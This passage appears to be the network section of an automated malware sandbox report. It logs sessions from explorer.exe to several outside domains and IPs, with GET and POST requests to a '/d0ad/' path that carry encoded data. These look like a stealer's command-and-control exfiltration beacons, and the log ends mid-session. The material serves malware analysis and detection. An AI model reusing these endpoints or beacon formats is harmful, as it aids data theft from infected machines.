jXu=ZE70(BI9tCuckiRlPUzDyXZkOcQvXsBhsPXpQGftlJIKQupSJ3U-eteVi3XkQSrInhoJfqA-WcFZiubd9uG9b3s_qUsaYSCqkuKUYJGNaPliyCIoWzjxiigbTxUEbqOmOowOnmhZYIz8MV7TQJOuAvt9e_vm6PeGAhAr~6MJ0VeWyKb-4L19qMNQs2Y8jdjQ6z7p~6ev5fh4uEA3tQeEpiLoJEprwM4FBGKGkiwjQqFX8E4mk7iKeOhV(gbjC_SC18xmZfOJp2sLTL(Ry6U5H2V2BS1TdkvSeOOo47KUZvDyYHqETxzGwY9p9D83XI6ug8LrRGtnpsSyYZGkYwOED7Xifgb_Ttiw2BksDGr_4PIiHtS-HYzYOgXhAFbApMyHH155fbe3oal_tei1lH55Xr8E53WW4G9N0uCqZBuf8TPeEZU_V0kZRpxZev8Alk9l5NDUTmyMqO~99sCfXYvEvKgEClGP27aBJ4KbCIbhPLkNofxN7z7J1fqVr2EcjBIOTALiBwCkTS(Rl0fOpgZ1ZNAfjtT296Y5kKgCtQ~ik6yGyQdRt6~sTJZtCHc5OjGk3pgUE5jyqrCpoRImQg2rJinQQPd8reOy19HzxtkPS4tQdToZBZOsyEWeJZrE(2QAB-hV78hYuoYFwi(jMCgiQ8TTQ12XvIpja-jsbqsWnmeCB9rtfUByuKZ2xbGbBw7O3zNoqgBbvpZnJxKQlq0Tdiq8O4spW5BwDiDoIkUF~bAjJ04Dtu8K1jABPOAnJcJtw-pEMa4iGyaikJho5X8BpKNjwqzpQRla2411FqF1hC3U8MMITZc2z4yy0XMdOQ87I1LUSiIn(2ttwsusMZ7gTKNonf1IrJdM0Rcu10rQ4_1ysA8C7v3qHd7b6p6U1rJlg5nCHmx-tnbe(uZvxaMEWOQNMdR3x-zPTymi~fB1E73_S0HoqIoTTBqguOn0sqZVw0Iv~JhseKtiQYqtg6LFwjD4YY6um8b8ukLAEKxKoKYM45Tv2oTwkPAYiwuJ2b5MH6gf2wOF23XoFYNNr4qk(ruhaEKp4EHu7VQ05xM8flocGQFdYTIOYPDeEz(fWUrZ5H(sKiNnB0jF9_GL~en9UgNPuFnnksN72GfVRHOJ8jh6vFf4kvhoxA2bdZsJ3dj5Usxtb3q63o5Bc_7uZnLervVCH_uggZl2i1V66aSgSXXGLE0RDQKYh_OYBzIAUQQ9G_ND33dIykoa(KeDYDA3~TV9sqk-9UjdV1VwpCQd9GWOE0rmZYhfHEQqrNjWOWMVipZbhEAeW1lBQJ64GB6DlamHxr3pzmM_U_nMz53P1HVRCujf9lOGzitgpFuxP8BcP0bEQ7Ogxbl99YG9heyLjoq68L4OPVPyvhVIJJ~6zPmmodpB~AZy35e42Y7AmWghQvaubw9ShuNxHoDpDJNUOTdgzuGhunUMkRgYADDGpUKlzG0C61Oi(Yb_PPrSYTYX8OyAeFdyo8hkzasmqh2XDuNU~hFdd_YSGW0M8VhW01g2oFB9JUy0FH6ZIxDWFUBvpqee8q6-of3pYzkYMycgReENSxcvp0Fw79qlE0R4O03kpOb3QubHEswWeErk4LxUGuswwRwvDR2ubEDd3IaIzPtsgOv1ZMTN9Po3yIjucAQtCAdBD1Q8D9tS5C911RauhrvUvlM4Fm14P4rhxfcm6_8rQCUxOpRYDLrjyf1rZ3HXcj01kLZSaxt397SDnOe3XoniADhN6aZhsIxaRXVbYrZwL9IV(TSNnwrK1ZyUVhSho1~LRUN-pH3IDfLZJalQC9PskArj7DmkK82REoEB22WtqKTMeXxz7qj6dFViEQ3IOrdvG74cA_x7u6xxrEWCsiWmSSRIiEcAqnrNJuiQFHxSs4v5Bu3va54QdNhNBjF-yhggKljhnKdNCvbHVgzW2nzIcEMsuslJCK8ilHIZoCLof-do7A31cvJxPzLxt5jxJewHmdh76Yrxe2MjE2epgXNYsuMO(VcEQbE32YGqlFCdBMvM3W7BIKPll9oaNtx6XoJKv3q01jCvemKZ1URDh2E77h2dnq(bMuGB0ptFk8k0EilLoH4a1FPqqkbSQDXygeHOXtmcFsbvRY6yId(bRV7ASTYoqPCusGF6yVqHPpBB6Kwp4uzg~bKRwcGiP-aoc3BV6CvR93eB4NKHpr64AZNRZCTVztJ9ehT1ZO2VtHGg~k3yNC8oA3BfpkGBhuTqWhw3X0Cp8zbetNQ5516PZb(aunZknwMnMNcjc0k4RT~mzRSHHNOGrV6loUFDLPe953sXMUHVY0n08duSvL0Mb4iUkONGslh8QlkEWjKfVKocgznWMoavhI8JVsXw8EiJX8lqFI0BidyV9BeYmyb5AGrPaRTPWJJRPwE4c9L8kOTmLPE5dO(GS2ZhhCB4RgBo0fwJ~njkV-gndoRqTNoWNtLrq-E_m2McBrSqHmp2MKjHV8v7D606lOZJC4qzbZnqhE9KOvd3~iAmhpw8LKlyGCn9FeQAG89e8fH9xaLIhu1dxp9eMP~7tIm9gQs-1MND4ePhacPofYzN58AxJ4MihdmoyvnErQcQIFiK1ArPIsuaGWPUfl2p3djHJ1aQy-VC4mV8zDp0w6vi7F2pN_N5Yyq9ycPcuA6GLnhu7W5HviQFBKrkY7(kGoF1jAydcG4-k_UzhbZuO81Ev69Ov0ZVXhnEiYizIpGw6DSvceDn4GeDhdawzCXQStE7aq6-Ie(pwrDmaSFblAy6vg59fJODqlm4pEMB8HSoHaTHgreh3kg2N2GVavOFds5CIkGvPNLoXqNGmSZQCh1ax-OagWQmH9AcLJkr5sRUluzBjZ9a6Oc6haQYJ028KDrBG3DNMhuBk0iWnUzW75ISKmghaLWe3LAfpIY7KX7Nayvy2Y6t0WiVDrY44ucpvxDDwVCRoalGI4eds_9w9JPGhohvTT0s5jwvP-QD7-xjB6VAmxjdx2G4mG8LloiFg7mVMLiqMVDUH85F7zo78UsFKTY6Jbzcu-vJRT09vA7zZCf6hSl_N6dkMD(CdtJ3S7iyi7I53GJyo05MPk9vWo6zzBsJ1Qmo4W14JhG4FaimkAa6CluQYfQc(fHuKzTqavEo2W4dvlS5b-C9jkA7xxuzt5ifuhxQkNK-ofQ-0qHZTCv6E0Ud80PS~1QyqkUiV_PDeAXRsAIJH3ITDWxlTqr6~zWyL8a6c9LyBAbb4wBDpchgpfxiTD~b5qU4i3YZMt7j~Gx9T2aCTfKhZp9nTEcMYNU1v-~yJHjbx5ygknqEHYxr2K6ASKIczY7JDYN1YaN1HaCe4l1YwLNS5wE2ynQ1elk8PSKtBZM-Q-0pWaRA2_JyOd(SLZ0F~TxW~51s16fdA-8auiw_UQUA(EntDpW7r-W73x8e9LtCk8GwF26ZzpwwSdKDsP4cEhKpq4Aq8PNHbEvBbmslO7xahlZ3mTfn2jPwEEvpokU2IxTQrphi40~YeQ9UhmcuG8wyB_4mYVHwZJlik8ZMSvDUL8T8SRE9bcxPFIRj0VVSew~ZMU804GSC27RBcvjmTKpNYBlZFe5WTglbDlDMa7IEIoZGSfPsbOpJvzbFAsOCrIMyux~W(u04H_f7SICxLJrHBJUw~WILRGvm433h1AanX14xGHpd(PjlX5EzucaWJ-GN0W1N4zIadYaPiM7TehQoyoceGOhj0siBQG(lchnZveIxLZNREMBCvG9TsX8H~PiPdQjqQOTFKil67ZFfMUOWdVAhkpuWcMRtrnRoekIUgvH2Pyg81aJt5mOJ1Y(qV8k9bZKIXYrkAPpYpxnic6nKJQJ_byQ8AF~PDnlbdtKzI2jJCBGcBGwyW23lcr~AehewYMDgWc36LsnleQRwZT9jRZDtZgwHionp~lM3gqii7wNTF4iDhZoTOBQIIDNzQEsUA6egg04-zm3UhyCmRgMHijkNyuSNBCGh7FCcPa7OMFSH6Lqo8Vw_(CgQgXzPGHq5PO4vpoK2amUZ(zbjPYzJZP414_qlPQZVqc2SHHg5o_kskukf47YT6pCNyzxvyyFTmap3ml0LcbEBFDoOvgftgIvVjO1vHEdEnCyBOBi00Z
Oct 26, 2022 13:18:43.286112070 CEST	1388	OUT	Data Raw: 36 58 78 30 41 44 7e 55 6a 70 65 4e 41 48 4b 5f 48 76 6f 30 70 75 68 69 52 57 73 66 33 38 74 53 41 64 32 48 31 49 5a 45 32 72 78 7a 54 70 33 4c 55 30 59 4a 30 2d 43 77 59 6e 32 75 67 59 71 61 28 59 52 32 37 6a 49 6b 45 54 4c 64 50 63 6c 6c 64 33 Data Ascii: 6Xx0AD~UjpeNAHK_Hvo0puhiRWsf38tSAd2H1IZE2rxzTp3LU0YJ0-CwYn2ugYqa(YR27jIkETLdPclld3Z-~mmBbi97Z8hRSGcPXOQpafq5~BSboR9OCIIeingEENnNZ8xbOtOvz_fu3wuP~ffGdN94~Ew31H3BCku6YzIgfPsm5J~uRepWB5ECNefEkWcpZELWU9PxeuD5PWQtjD34Ftj_VO0tb79zq1VjmPhzINamGLvflcy
Oct 26, 2022 13:18:43.431755066 CEST	1391	OUT	Data Raw: 58 6d 61 76 5a 50 33 44 36 37 57 58 4b 69 75 48 79 33 79 6a 7e 56 6d 35 55 48 79 48 43 30 59 46 34 59 7a 33 67 6b 44 4a 57 73 6b 6d 4d 61 36 52 67 4b 44 30 48 66 66 34 6d 42 45 31 66 73 73 59 49 63 7e 59 6f 51 47 64 49 37 79 4b 79 6c 54 4c 76 79 Data Ascii: XmavZP3D67WXKiuHy3yj~Vm5UHyHC0YF4Yz3gkDJWskmMa6RgKD0Hff4mBE1fssYIc~YoQGdI7yKylTLvyAo6NZQJvo2Thoh4EiPJU3G1k1CSWjY4554LIHlLCnE2Qj_zxm99-CjuSdgYpakSbsfPwPILK9b72XeQD7DSIZ4OnE_38Yo014ssL2w(wQKIOGk2qSyNmmmq_ps1wuIqaKlJacjwgsJ42(2rFkwORL_4qQ3OShkWMN
Oct 26, 2022 13:18:43.432115078 CEST	1391	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:18:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
Oct 26, 2022 13:18:43.432251930 CEST	1394	OUT	Data Raw: 4d 73 4f 77 42 72 37 31 33 45 70 75 65 44 78 6e 58 33 49 6a 4f 47 38 6c 36 44 47 4d 38 65 5a 48 46 50 4b 37 4b 4b 34 65 45 69 31 43 57 6f 70 34 74 45 33 42 58 76 70 59 45 52 66 37 39 68 43 75 42 53 30 48 51 5a 6c 36 6d 77 6d 72 71 41 30 7a 7a 39 Data Ascii: MsOwBr713EpueDxnX3IjOG8l6DGM8eZHFPK7KK4eEi1CWop4tE3BXvpYERf79hCuBS0HQZl6mwmrqA0zz9MAt97nqZ~RjojtQOhqX0~awAsNZTUrJYqSRidl4jt-HwvwFV4-Haoq5CkVhTr1j3atrXahWUACforp6PG3XkeiddigpYKuEx03FautpKLiqGAhh16yFk5_I-R57nKdKF0-aOu71pCiTS6iUfKx7F5kTrQh6uTRXdR
Oct 26, 2022 13:18:43.432391882 CEST	1395	OUT	Data Raw: 56 71 45 54 4f 70 38 76 31 72 50 42 4a 6b 6b 4d 42 49 4d 70 79 65 79 67 77 78 7e 58 4d 32 4c 59 49 6f 46 32 6a 33 53 73 4c 38 4b 43 31 68 46 6a 66 6f 63 55 4d 5f 4f 70 57 36 7e 4b 71 6b 75 69 39 41 4e 30 6c 78 39 31 49 58 38 38 4a 34 70 67 71 5f Data Ascii: VqETOp8v1rPBJkkMBIMpyeygwx~XM2LYIoF2j3SsL8KC1hFjfocUM_OpW6~Kqkui9AN0lx91IX88J4pgq_tlKXHikvppLPFNeHbXzKdFBpVHa6GjRNJzOuAjzHyJchsbs681oeRF7tMuPVU_FPDf5QYMfu4fwmsU603hWjF2IinF24Ni3vMWPPkORv0pyxzI6qGS3GXL16aYXH4bvPwlAAeMXRbWWD92(olgrKJhllWFUKDCa86
Oct 26, 2022 13:18:43.432450056 CEST	1404	OUT	Data Raw: 57 62 39 58 58 36 39 4e 4d 38 49 42 6d 49 38 31 6c 6c 4c 67 4a 6e 6f 4b 57 6a 6d 53 44 4a 71 46 37 4f 36 67 38 46 73 70 61 64 39 74 44 54 76 51 6c 61 34 32 78 52 77 4d 5a 58 34 30 57 69 68 2d 68 47 7a 49 42 6b 45 5f 37 59 50 74 65 71 72 6e 31 33 Data Ascii: Wb9XX69NM8IBmI81llLgJnoKWjmSDJqF7O6g8Fspad9tDTvQla42xRwMZX40Wih-hGzIBkE_7YPteqrn1329Q3b055jc8jYgz_4o~UrugByrZfvsYVa8skrQDaa6c5RsRREa5F9ze-IZ6XKmOod6VYb_VIhNYc7bJkMIevmbBufOGuDoUViuo5nQ2_NN5eKjF_bKv6iuW9kPjz9P2giBAx5_tDesRGPzng81JVjJhydzF5BFlbh
Oct 26, 2022 13:18:43.432672024 CEST	1414	OUT	Data Raw: 75 42 6f 58 36 62 73 6b 7e 51 61 6e 28 57 73 4b 54 6c 48 6b 65 59 6f 73 6d 65 66 67 28 44 28 36 58 5f 4d 44 36 6c 6e 59 38 72 44 6a 79 39 6e 74 38 51 79 54 52 42 62 74 64 4f 61 6e 67 50 32 69 50 6e 5a 6e 6b 76 31 53 49 39 69 56 44 74 63 4f 47 79 Data Ascii: uBoX6bsk~Qan(WsKTlHkeYosmefg(D(6X_MD6lnY8rDjy9nt8QyTRBbtdOangP2iPnZnkv1SI9iVDtcOGyEengxZ~DNOVgE7hcp_4OCgkSz2T_ZInfAso_XdNZ~XLgvHf9q-eXApUGlioSwL9_hcsZXJ1aX3xQRnpdaOobMU5NyDhC40T1IUDtUmeZ0k6ag58VdAXcLkOJHSHL96uBRMYBrx1t(owItMq-Gbq7pdmfN-sQKwE-r
Oct 26, 2022 13:18:43.578275919 CEST	1417	OUT	Data Raw: 79 49 6d 7a 6a 36 70 6f 47 4d 65 36 34 37 54 43 49 35 43 68 43 43 58 77 33 53 75 4b 55 43 77 71 52 46 49 65 55 38 66 39 28 77 7a 44 6f 52 4b 31 65 32 54 47 76 43 72 56 71 52 4a 68 36 6f 61 44 4d 6e 4e 42 68 63 59 4b 4d 7a 4f 39 74 6a 53 78 7e 7a Data Ascii: yImzj6poGMe647TCI5ChCCXw3SuKUCwqRFIeU8f9(wzDoRK1e2TGvCrVqRJh6oaDMnNBhcYKMzO9tjSx~z~ZbqJImK~M5hx1fHUiP_zUqQuBs0kYcvs0C1Tq49aNnGT6vUh5RPbttEe0B_pUeIhmC3cFWfaTQQ1iAh6ywq(wCvGs7YK6~Pg-T1naDvx53yn2mZ6woSULDEsYuh2mzTVJwPAOne0Rxdyu~pUjfkae9fFwb6QWDET
Oct 26, 2022 13:18:43.578382015 CEST	1425	OUT	Data Raw: 7a 76 6f 6f 49 4a 39 4b 61 4e 46 69 61 56 78 33 28 66 5a 35 4c 32 66 44 32 62 72 34 49 43 37 38 6e 6d 43 35 42 6b 7a 65 63 4a 74 46 6a 57 4b 6a 30 75 6c 4f 50 62 58 4a 66 62 4b 73 52 71 6d 6c 65 31 4d 72 4c 68 74 4d 53 68 38 57 56 34 28 59 70 48 Data Ascii: zvooIJ9KaNFiaVx3(fZ5L2fD2br4IC78nmC5BkzecJtFjWKj0ulOPbXJfbKsRqmle1MrLhtMSh8WV4(YpHadT6Vsgt0uaeluLGWFLjEREqI2~C2Q9r6v159PhmMbAZh1WiuuX5A4aVcyK3h_(13fyi7CUn6EcibppWC83KYNhZO1wMxu5-Y_Eut7C3uos7iI9ZaLIKjbOdloAOIB8qHLap7zFuC3U_C2mZ9c7GhInIzTfxdXP_N
Oct 26, 2022 13:18:43.578453064 CEST	1428	OUT	Data Raw: 6c 4c 76 66 7e 32 36 52 54 46 46 32 6b 4a 6b 79 36 59 49 36 43 34 46 6b 67 33 6d 59 7a 57 65 46 45 78 53 30 61 50 75 55 33 43 31 6e 58 6c 76 78 28 71 75 71 56 45 66 44 34 4e 7a 78 70 39 6c 37 41 51 75 48 37 76 70 74 51 73 66 2d 36 31 44 33 32 6d Data Ascii: lLvf~26RTFF2kJky6YI6C4Fkg3mYzWeFExS0aPuU3C1nXlvx(quqVEfD4Nzxp9l7AQuH7vptQsf-61D32mlpNADwXFgDfuHW1tOUGKDxCuUQD7LU6uG0c5qtcIzFO5SW7ZhtsKEcRHu2Enpzl5wsfGJ0IJWsolsEUEH2jfCc7ghV~lzeupYCxEFVFAiKCazpDmPsMEu9sNwqLI9dqhWabqt9AfSsf_w0iWqpkfyf8yBYbUhiWNq
Oct 26, 2022 13:18:43.578653097 CEST	1428	OUT	Data Raw: 62 45 65 55 4a 68 68 75 43 41 51 59 76 50 77 73 63 39 6b 6e 58 76 53 53 46 6c 4b 68 48 34 77 35 75 66 69 75 38 32 7e 30 62 63 28 51 51 33 6a 75 6d 31 4c 67 64 34 6e 4f 30 71 72 49 72 4e 43 33 67 47 67 6e 35 54 74 33 61 52 64 7a 46 61 77 63 38 41 Data Ascii: bEeUJhhuCAQYvPwsc9knXvSSFlKhH4w5ufiu82~0bc(QQ3jum1Lgd4nO0qrIrNC3gGgn5Tt3aRdzFawc8A5m57bixT04sCB4gZTUrCjaYUQNCUk-NQWv95hplkM2vFCnKiYZbrgBrOnIQdTCdRsGgXfuiZ9u2HHgNu~9Fb19f7WeRURjmhFOrvM_tKE_doroDCDQL6IFRt7v1BvDKGpeNEkCQ8k-o-AtUYsRDFzdRkb8He0G7Il

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.11.20	49905	64.64.242.59	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:45.457417011 CEST	1429	OUT	GET /d0ad/?jXu=UGTU82wtujibqQR8E2n422F7Zfw2d+xFnOfFMWTM8LMnetJ3NkFDX8bqmUj8VDzwoxc6QpBbYfZ2mv7LzdW/Xm9DjEFcRTi1ig==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.7o0i.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:18:45.603863955 CEST	1430	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:18:45 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.11.20	49906	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:18:57.244474888 CEST	1430	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=EKBIswxubh+3rSi760MLmAr4JXvPRLtL3ozMDitkvV65RFIqiY835aWCQtue5THCT9fxMq7VmpQKPerXNr4JKGfkodcEQfh6sQ== HTTP/1.1 Host: www.salemsilverpalace.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:18:57.273859024 CEST	1431	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:18:57 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.11.20	49907	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:02.302799940 CEST	1432	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 67 78 70 70 5a 77 6f 54 51 4c 4b 68 56 67 36 30 4e 67 54 7a 51 79 61 6b 4b 46 6c 73 53 66 50 38 4a 38 31 6b 66 4d 37 43 37 72 77 2d 4a 4c 49 47 30 67 53 65 38 34 50 53 75 63 4a 4e 78 32 42 78 73 5f 72 6e 41 4c 37 32 6e 44 69 51 73 46 36 75 69 76 35 45 63 53 4f 62 4f 79 63 4f 67 6c 4a 54 42 77 62 50 56 4a 70 53 4f 6e 42 62 44 4c 59 57 36 54 30 62 6e 53 38 37 79 73 4b 53 54 53 59 65 47 64 30 73 45 52 38 54 5a 56 38 73 59 71 28 54 57 76 79 43 38 4f 57 4a 49 38 6a 45 32 45 66 42 70 4d 49 5f 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=uhh96udzgihpgxppZwoTQLKhVg60NgTzQyakKFlsSfP8J81kfM7C7rw-JLIG0gSe84PSucJNx2Bxs_rnAL72nDiQsF6uiv5EcSObOycOglJTBwbPVJpSOnBbDLYW6T0bnS87ysKSTSYeGd0sER8TZV8sYq(TWvyC8OWJI8jE2EfBpMI_~w).
Oct 26, 2022 13:19:02.328896046 CEST	1432	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:19:02 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.11.20	49908	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:19:04.349206924 CEST	1434	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 36 53 78 70 63 54 41 54 52 72 4b 69 57 67 36 30 55 51 54 33 51 79 57 6b 4b 45 68 38 52 70 6e 38 4a 65 74 6b 65 4a 58 43 31 4c 77 2d 42 72 49 44 70 77 53 56 38 34 43 6c 75 64 31 4e 78 32 46 78 74 4a 58 6e 49 62 37 31 76 6a 69 66 38 6c 36 6a 77 66 35 30 63 53 43 50 4f 7a 34 4f 67 55 31 54 41 31 48 50 51 62 4e 4e 4b 48 41 51 42 4c 5a 41 78 7a 30 64 6e 53 78 47 79 74 6a 6e 51 6a 73 65 47 38 55 73 46 52 38 51 54 6c 38 76 48 36 7e 52 54 4d 54 54 77 38 65 37 59 76 76 46 32 31 75 52 6b 64 74 32 74 65 52 48 28 74 51 52 28 55 31 67 6e 6c 36 57 39 6f 4e 4e 51 36 6a 38 53 5f 46 66 69 62 79 6e 33 43 48 4b 5a 77 67 63 69 59 38 67 43 62 4a 44 52 66 50 76 71 4a 69 32 5a 50 30 6e 4e 5f 7a 58 79 68 44 57 6d 38 33 57 56 35 59 58 48 6d 6f 41 51 6b 38 61 35 72 44 2d 37 41 52 5f 43 2d 28 66 4a 43 42 49 37 66 31 4a 74 74 35 5f 65 7a 55 67 49 63 67 30 33 6e 42 73 73 31 6f 30 43 45 43 7a 68 66 4a 35 77 5a 48 64 38 34 7e 57 6f 75 78 6d 64 52 63 48 43 57 68 71 48 36 55 4f 66 77 74 51 49 52 63 6f 59 79 53 36 56 47 6f 67 36 67 7a 34 59 34 53 76 59 39 6f 72 6b 45 73 6a 55 6d 59 57 61 45 7a 4e 42 37 47 6b 59 4b 65 42 28 71 70 32 75 62 44 69 77 59 7e 37 55 69 30 45 46 76 58 6b 68 51 68 36 53 42 56 2d 4c 42 48 67 77 6b 45 33 73 70 59 44 68 6f 47 47 70 54 64 42 46 31 5a 62 57 69 36 51 5a 75 7a 79 33 5a 36 63 73 6e 63 78 75 72 39 58 42 39 4d 53 69 51 66 5a 28 4f 58 63 4a 33 66 5f 61 53 75 39 28 6b 43 4e 75 7a 54 68 6d 31 6c 65 79 4d 35 39 55 43 43 39 7a 76 4c 53 41 55 70 34 6c 70 49 68 70 42 64 65 48 50 71 77 79 52 6e 54 51 54 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=uhh96udzgihp6SxpcTATRrKiWg60UQT3QyWkKEh8Rpn8JetkeJXC1Lw-BrIDpwSV84Clud1Nx2FxtJXnIb71vjif8l6jwf50cSCPOz4OgU1TA1HPQbNNKHAQBLZAxz0dnSxGytjnQjseG8UsFR8QTl8vH6~RTMTTw8e7YvvF21uRkdt2teRH(tQR(U1gnl6W9oNNQ6j8S_Ffibyn3CHKZwgciY8gCbJDRfPvqJi2ZP0nN_zXyhDWm83WV5YXHmoAQk8a5rD-7AR_C-(fJCBI7f1Jtt5_ezUgIcg03nBss1o0CECzhfJ5wZHd84~WouxmdRcHCWhqH6UOfwtQIRcoYyS6VGog6gz4Y4SvY9orkEsjUmYWaEzNB7GkYKeB(qp2ubDiwY~7Ui0EFvXkhQh6SBV-LBHgwkE3spYDhoGGpTdBF1ZbWi6QZuzy3Z6csncxur9XB9MSiQfZ(OXcJ3f_aSu9(kCNuzThm1leyM59UCC9zvLSAUp4lpIhpBdeHPqwyRnTQTg.
Oct 26, 2022 13:19:04.375495911 CEST	1434	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:19:04 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.11.20	49909	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
